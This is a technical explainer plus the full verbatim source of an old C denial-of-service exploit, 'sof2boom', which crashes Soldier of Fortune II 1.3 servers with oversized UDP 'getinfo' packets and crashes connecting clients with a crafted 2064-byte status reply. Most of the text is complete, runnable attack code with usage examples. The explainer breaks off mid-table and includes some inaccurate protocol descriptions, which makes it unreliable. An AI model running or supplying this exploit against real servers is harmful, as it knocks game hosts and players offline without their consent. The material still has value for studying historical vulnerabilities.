Soldier of Fortune II 1.3 Denial of Service Explained

What this paper is

This paper details a Denial of Service (DoS) vulnerability in Soldier of Fortune II (SOF2) versions 1.3 and earlier. It describes two methods of attack:

1. Client Crash: Exploiting how the SOF2 client handles specific network packets, causing it to crash or stop responding.
2. Server Shutdown/Crash: Exploiting how the SOF2 server handles malformed or oversized network packets, leading to a crash or a denial of service by stopping game operations.

The exploit code provided is a C program designed to send specially crafted UDP packets to either the SOF2 client or server.

Simple technical breakdown

The vulnerability lies in how the SOF2 game client and server process certain UDP messages.

• Client Attack: When a client receives a UDP packet of a specific, large size (2064 bytes in this case), it attempts to parse it as a game status response. This oversized packet causes a buffer overflow or a similar memory corruption issue, leading to a client crash. The exploit code listens for any UDP traffic and, upon receiving a packet, sends back a crafted, oversized response.

• Server Attack: The server is vulnerable to receiving malformed or excessively large packets.

  • A smaller, but still oversized, packet (around 1000-1014 bytes) can disrupt the server's game state, effectively stopping the match or making it unplayable.
  • A larger packet (greater than approximately 1014 bytes, up to BUFFSZ - sizeof(SVBOF)) can cause the server to crash entirely, especially on Windows systems. The exploit sends a crafted packet starting with \xff\xff\xff\xff followed by "getinfo " and then a large amount of padding data.

Complete code and payload walkthrough

The provided C code implements the exploit. Let's break it down.

/*
by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    /*
   Header file used for manage errors in Windows
   It support socket and errno too
   (this header replace the previous sock_errX.h)
*/

#include <string.h>
#include <errno.h>

// ... (std_err function for Windows) ...

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif

#define VER         "0.1"
#define BUFFSZ      4096
#define PORT        20100
#define TIMEOUT     3
#define CHR         'a'
#define CLBOOMSIZE  2064
#define INFO        "\xff\xff\xff\xff" "getstatus xxx\n"
#define SVBOF       "\xff\xff\xff\xff" "getinfo "
#define CLBOF       "\xff\xff\xff\xff" \
                    "%sResponse\n" \
                    "\\sv_allowDownload\\0" \
                    "\\sv_allowAnonymous\\0" \
                    "\\punkbuster\\1" \
                    "\\needpass\\0" \
                    "\\pure\\0" \
                    "\\gametype\\elim" \
                    "\\sv_maxclients\\32" \
                    "\\clients\\16" \
                    "\\hostname\\noname" \
                    "\\protocol\\2004" \
                    "\\mapname\\mp_jor1" \
                    "\\"

void show_info(u_char *data);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

// ... (main function) ...
// ... (show_info function) ...
// ... (timeout function) ...
// ... (resolv function) ...
// ... (std_err function for non-Windows) ...

Core Components:

• Includes and Defines:

  • Standard C libraries (stdio.h, stdlib.h, string.h).
  • Platform-specific socket headers (winsock.h for Windows, others for Unix-like systems).
  • WIN32 preprocessor directive handles Windows-specific socket functions (closesocket instead of close, WSAGetLastError).
  • VER: Exploit version.
  • BUFFSZ: Maximum buffer size (4096 bytes).
  • PORT: Default UDP port (20100).
  • TIMEOUT: Timeout for socket operations (3 seconds).
  • CHR: Padding character ('a').
  • CLBOOMSIZE: Size of the payload for client attack (2064 bytes).
  • INFO: A UDP packet used to query server status (\xff\xff\xff\xffgetstatus xxx\n). The \xff\xff\xff\xff is a common broadcast/multicast prefix in some game protocols.
  • SVBOF: The prefix for the server attack payload (\xff\xff\xff\xffgetinfo ). This is sent to trigger the server vulnerability.
  • CLBOF: A template for a crafted response sent to clients. It includes game server settings and is designed to be oversized.

• std_err Function (Windows):

  • Purpose: To translate Windows Sockets API error codes into human-readable messages and print them to stderr.
  • Behavior: Uses WSAGetLastError() to get the error code and a switch statement to map common error codes to descriptive strings. If the error code is not recognized, it attempts to use strerror(errno) (though errno might not be directly applicable to Winsock errors in all cases, it's a fallback). Finally, it prints the error and exits the program.
  • Mapping: WSAGetLastError() -> Error Message String.

• main Function:

  • Purpose: The entry point of the program, handles argument parsing, socket setup, and orchestrates the attack.
  • Behavior:
    • Initializes stdout buffering.
    • Prints banner information.
    • Checks for command-line arguments (argc). If fewer than 2, it prints usage instructions and exits.
    • Initializes Winsock if on Windows (WSAStartup).
    • Parses the attack type (type = argv[1][0]).
    • If type == 's' (Server Attack):
      • Requires at least 4 arguments: sof2boom s SIZE SERVER [PORT].
      • Parses the svboom (size of data to send) from argv[2].
      • Validates svboom against BUFFSZ to prevent buffer overflows within the exploit itself.
      • Resolves the target server's IP address using resolv(argv[3]).
      • Sets the target port from argv[4] if provided, otherwise uses the default PORT.
      • Prints target information.
      • Creates a UDP socket (socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)).
      • Sends an INFO packet to the server to check if it's online and responsive.
      • Uses timeout(sd) to wait for a reply. If no reply, it indicates the server might be offline or the port is wrong.
      • Receives the server's reply using recvfrom.
      • Calls show_info to display the server's status response.
      • Constructs the server attack payload: buff is filled with SVBOF and then padded with svboom bytes of CHR.
      • Sends the crafted "BOOM" packet to the server using sendto.
      • Uses timeout(sd) again. If it times out, it assumes the server crashed. If a reply is received, it suggests the server is not vulnerable.
      • Sends another INFO packet to check the server's state after the potential attack.
      • If timeout(sd) returns -1 (timeout), it declares the server vulnerable. Otherwise, it prints the received reply, indicating the server is likely not vulnerable.
    • If type == 'c' (Client Attack):
      • Requires at least 2 arguments: sof2boom c [PORT].
      • Sets peer.sin_addr.s_addr to INADDR_ANY to listen on all interfaces.
      • Sets the listening port from argv[2] if provided, otherwise uses the default PORT.
      • Prints listening port information.
      • Creates a UDP socket.
      • Sets SO_REUSEADDR to allow rebinding the port quickly.
      • Binds the socket to the listening address and port using bind.
      • Enters an infinite loop (for(;;)):
        • Waits to receive a UDP packet using recvfrom.
        • Prints the source IP, port, and the received data.
        • Checks if the received packet starts with \xff\xff\xff\xff and contains "getinfo" (indicating a server status request).
        • If it's a "getinfo" request, it formats a response using CLBOF with "info".
        • Otherwise, it formats a response using CLBOF with "status".
        • The CLBOF template is constructed. The sprintf call fills in the first part.
        • The rest of the buffer (buff + len) is filled with CHR padding until CLBOOMSIZE is reached. This oversized packet is the payload for the client.
        • Sends this oversized response back to the client that sent the original packet using sendto.
    • If type is invalid: Prints an error message and exits.
    • Closes the socket (close(sd)).
    • Returns 0.

• show_info Function:

  • Purpose: To parse and display server information received in a specific format (key-value pairs separated by backslashes).
  • Behavior: Iterates through the input data string, finding backslashes (\). It replaces the backslash with a null terminator (0x00) to split the string into tokens. It alternates between printing a label and its value.
  • Mapping: strchr(data, '\\') -> Finds the delimiter. *p = 0x00 -> Splits the string.

• timeout Function:

  • Purpose: To implement a timeout for socket operations using select.
  • Behavior: Sets up a timeval structure for the timeout duration. It creates a file descriptor set (fd_set) and adds the given sock to it. select is called to wait for the socket to become readable.
  • Return Value:
    • Returns -1 if select times out (no data received within TIMEOUT seconds).
    • Returns 0 if data is available.
    • Returns an error code from select if an error occurs.

• resolv Function:

  • Purpose: To resolve a hostname (or IP address string) into an IP address.
  • Behavior: First, it tries to convert the input host string directly into an IP address using inet_addr. If this fails (INADDR_NONE), it uses gethostbyname to perform a DNS lookup. If the lookup fails, it prints an error and exits. Otherwise, it returns the IP address.
  • Mapping: inet_addr(host) -> Direct IP string conversion. gethostbyname(host) -> DNS lookup.

• std_err Function (Non-Windows):

  • Purpose: To print system errors using perror and exit.
  • Behavior: Calls perror with a prefix "Error" and then exits the program. This is a simpler error handler for POSIX systems.

Payload Segments:

• INFO Payload: "\xff\xff\xff\xff" "getstatus xxx\n"

  • Purpose: Sent to the server to elicit a status response. This is a reconnaissance step.
  • Structure: A 4-byte header (likely a broadcast/multicast identifier) followed by a command string.

• SVBOF Prefix: "\xff\xff\xff\xff" "getinfo "

  • Purpose: The initial part of the payload sent to the server for the DoS attack.
  • Structure: Similar header to INFO, followed by the "getinfo " command. The exploit then appends a variable amount of padding (CHR characters) to reach the desired oversized packet size.

• CLBOF Template: "\xff\xff\xff\xff" "%sResponse\n" "\\sv_allowDownload\\0" ... "\\mapname\\mp_jor1" "\\"

  • Purpose: A template used to construct a response packet sent to clients when the client attack is active.
  • Structure:
    • \xff\xff\xff\xff: Header.
    • %sResponse\n: Placeholder for "info" or "status".
    • A series of game server configuration parameters, each terminated by \0. These are standard SOF2 server variables.
    • \\: Trailing backslash.
  • Exploitation: When this template is filled and then padded with CLBOOMSIZE bytes of CHR, it creates an oversized packet that crashes the client.

Code Fragment -> Practical Purpose Mapping:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    /*
   Header file used for manage errors in Windows
   It support socket and errno too
   (this header replace the previous sock_errX.h)
*/

#include <string.h>
#include <errno.h>



void std_err(void) {
    char    *error;

    switch(WSAGetLastError()) {
        case 10004: error = "Interrupted system call"; break;
        case 10009: error = "Bad file number"; break;
        case 10013: error = "Permission denied"; break;
        case 10014: error = "Bad address"; break;
        case 10022: error = "Invalid argument (not bind)"; break;
        case 10024: error = "Too many open files"; break;
        case 10035: error = "Operation would block"; break;
        case 10036: error = "Operation now in progress"; break;
        case 10037: error = "Operation already in progress"; break;
        case 10038: error = "Socket operation on non-socket"; break;
        case 10039: error = "Destination address required"; break;
        case 10040: error = "Message too long"; break;
        case 10041: error = "Protocol wrong type for socket"; break;
        case 10042: error = "Bad protocol option"; break;
        case 10043: error = "Protocol not supported"; break;
        case 10044: error = "Socket type not supported"; break;
        case 10045: error = "Operation not supported on socket"; break;
        case 10046: error = "Protocol family not supported"; break;
        case 10047: error = "Address family not supported by protocol family"; break;
        case 10048: error = "Address already in use"; break;
        case 10049: error = "Can't assign requested address"; break;
        case 10050: error = "Network is down"; break;
        case 10051: error = "Network is unreachable"; break;
        case 10052: error = "Net dropped connection or reset"; break;
        case 10053: error = "Software caused connection abort"; break;
        case 10054: error = "Connection reset by peer"; break;
        case 10055: error = "No buffer space available"; break;
        case 10056: error = "Socket is already connected"; break;
        case 10057: error = "Socket is not connected"; break;
        case 10058: error = "Can't send after socket shutdown"; break;
        case 10059: error = "Too many references, can't splice"; break;
        case 10060: error = "Connection timed out"; break;
        case 10061: error = "Connection refused"; break;
        case 10062: error = "Too many levels of symbolic links"; break;
        case 10063: error = "File name too long"; break;
        case 10064: error = "Host is down"; break;
        case 10065: error = "No Route to Host"; break;
        case 10066: error = "Directory not empty"; break;
        case 10067: error = "Too many processes"; break;
        case 10068: error = "Too many users"; break;
        case 10069: error = "Disc Quota Exceeded"; break;
        case 10070: error = "Stale NFS file handle"; break;
        case 10091: error = "Network SubSystem is unavailable"; break;
        case 10092: error = "WINSOCK DLL Version out of range"; break;
        case 10093: error = "Successful WSASTARTUP not yet performed"; break;
        case 10071: error = "Too many levels of remote in path"; break;
        case 11001: error = "Host not found"; break;
        case 11002: error = "Non-Authoritative Host not found"; break;
        case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
        case 11004: error = "Valid name, no data record of requested type"; break;
        default: error = strerror(errno); break;
    }
    fprintf(stderr, "\nError: %s\n", error);
    exit(1);
}




    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER         "0.1"
#define BUFFSZ      4096
#define PORT        20100
#define TIMEOUT     3
#define CHR         'a'
#define CLBOOMSIZE  2064
#define INFO        "\xff\xff\xff\xff" "getstatus xxx\n"
#define SVBOF       "\xff\xff\xff\xff" "getinfo "
#define CLBOF       "\xff\xff\xff\xff" \
                    "%sResponse\n" \
                    "\\sv_allowDownload\\0" \
                    "\\sv_allowAnonymous\\0" \
                    "\\punkbuster\\1" \
                    "\\needpass\\0" \
                    "\\pure\\0" \
                    "\\gametype\\elim" \
                    "\\sv_maxclients\\32" \
                    "\\clients\\16" \
                    "\\hostname\\noname" \
                    "\\protocol\\2004" \
                    "\\mapname\\mp_jor1" \
                    "\\"



void show_info(u_char *data);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    int         sd,
                len,
                psz,
                on = 1,
                type,
                svboom = 0;
    u_short     port = PORT;
    u_char      buff[BUFFSZ + 1];
    struct  sockaddr_in peer;


    setbuf(stdout, NULL);

    fputs("\n"
        "Soldier of Fortune II <= 1.3 server and client crash/stop "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <attack> [port(%d)]\n"
            "\n"
            "Attack:\n"
            " c = broadcast clients crash (caused by a valid reply of %d bytes)\n"
            " s = server shutdown/crash, the effect depends by the amount of data you send.\n"
            "     The amount of data and the IP or hostname of the server must be specified\n"
            "     after the 's' in this format: sof2boom s SIZE SERVER [PORT]\n"
            "     Usually the values >= 1014 crash the server (only if Windows), while a\n"
            "     lower values (like 1000) stop the match, try yourself\n"
            "\n"
            "Usage examples:\n"
            "  sof2boom c                       listens on port %d for clients\n"
            "  sof2boom c 1234                  listens on port 1234\n"
            "  sof2boom s 1000 192.168.0.1      tests the server 192.168.0.1 on port %d\n"
            "  sof2boom s 1200 sof2server 1234  tests the server sof2server on port 1234\n"
            "\n", argv[0], port, CLBOOMSIZE, port, port);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif    

    type = argv[1][0];

    if(type == 's') {
        if(argc < 4) {
            fputs("\n"
                "Error: you must specify the number of bytes to send and the server hostname.\n"
                "       Example: sof2boom s 1000 localhost\n"
                "\n", stdout);
            exit(1);
        }
        svboom = atoi(argv[2]);
        if(svboom > (BUFFSZ - sizeof(SVBOF))) {
            printf("\nError: use a value minor than %d\n\n", BUFFSZ - sizeof(SVBOF));
            exit(1);
        }

        peer.sin_addr.s_addr = resolv(argv[3]);
        if(argc > 4) port = atoi(argv[4]);
        printf("- target   %s:%hu\n",
            inet_ntoa(peer.sin_addr),
            port);

    } else if(type == 'c') {
        peer.sin_addr.s_addr = INADDR_ANY;
        psz                  = sizeof(peer);
        if(argc > 2) port = atoi(argv[2]);
        printf("- listen on port %d\n", port);

    } else {
        fputs("\n"
            "Error: Wrong type of chosen attack.\n"
            "       You can choose between 2 types of attacks, passive versus clients with\n"
            "       'c' or versus servers with 's'\n"
            "\n", stdout);
        exit(1);
    }

    peer.sin_port   = htons(port);
    peer.sin_family = AF_INET;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(type == 's') {
        fputs("- request informationss\n", stdout);
        if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        if(timeout(sd) < 0) {
            fputs("\n"
                "Error: socket timeout, probably the server is not online or the port is wrong\n"
                "\n", stdout);
            exit(1);
        }
        len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
        if(len < 0) std_err();
        buff[len] = 0x00;
        show_info(buff);

        memcpy(buff, SVBOF, sizeof(SVBOF) - 1);
        memset(buff + sizeof(SVBOF) - 1, CHR, svboom);
        len = sizeof(SVBOF) - 1 + svboom;

        printf("- send BOOM packet (%d bytes)\n", len);

        if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        if(timeout(sd) < 0) {
            fputs("- no reply received, it is probably crashed\n", stdout);
        } else {
            fputs("- received a reply, probably it is not vulnerable\n", stdout);
            len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
            if(len < 0) std_err();
        }

        fputs("- check server\n", stdout);
        if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        if(timeout(sd) < 0) {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        } else {
            len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
            if(len < 0) std_err();
            buff[len] = 0x00;
            printf("\n"
                "Server doesn't seem to be vulnerable, the following is the reply received:\n"
                "\n"
                "%s\n"
                "\n", buff);
        }

    } else {
        if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
          < 0) std_err();
        if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        fputs("  Clients:\n", stdout);
        for(;;) {
            len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
            if(len < 0) std_err();
            buff[len] = 0x00;

            printf("%16s:%hu -> %s\n",
                inet_ntoa(peer.sin_addr),
                ntohs(peer.sin_port),
                buff);

            if(!memcmp(buff + 4, "getinfo", 7)) {
                len = sprintf(buff, CLBOF, "info");
            } else {
                len = sprintf(buff, CLBOF, "status");
            }
            memset(buff + len, CHR, CLBOOMSIZE - len);
            if(sendto(sd, buff, CLBOOMSIZE, 0, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();
        }
    }

    close(sd);
    return(0);
}



void show_info(u_char *data) {
    int     nt = 1;
    u_char  *p;

    while((p = strchr(data, '\\'))) {
        *p = 0x00;
        if(!nt) {
            printf("%30s: ", data);
            nt++;
        } else {
            printf("%s\n", data);
            nt = 0;
        }
        data = p + 1;
    }
    printf("%s\n", data);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif




// milw0rm.com [2004-11-23]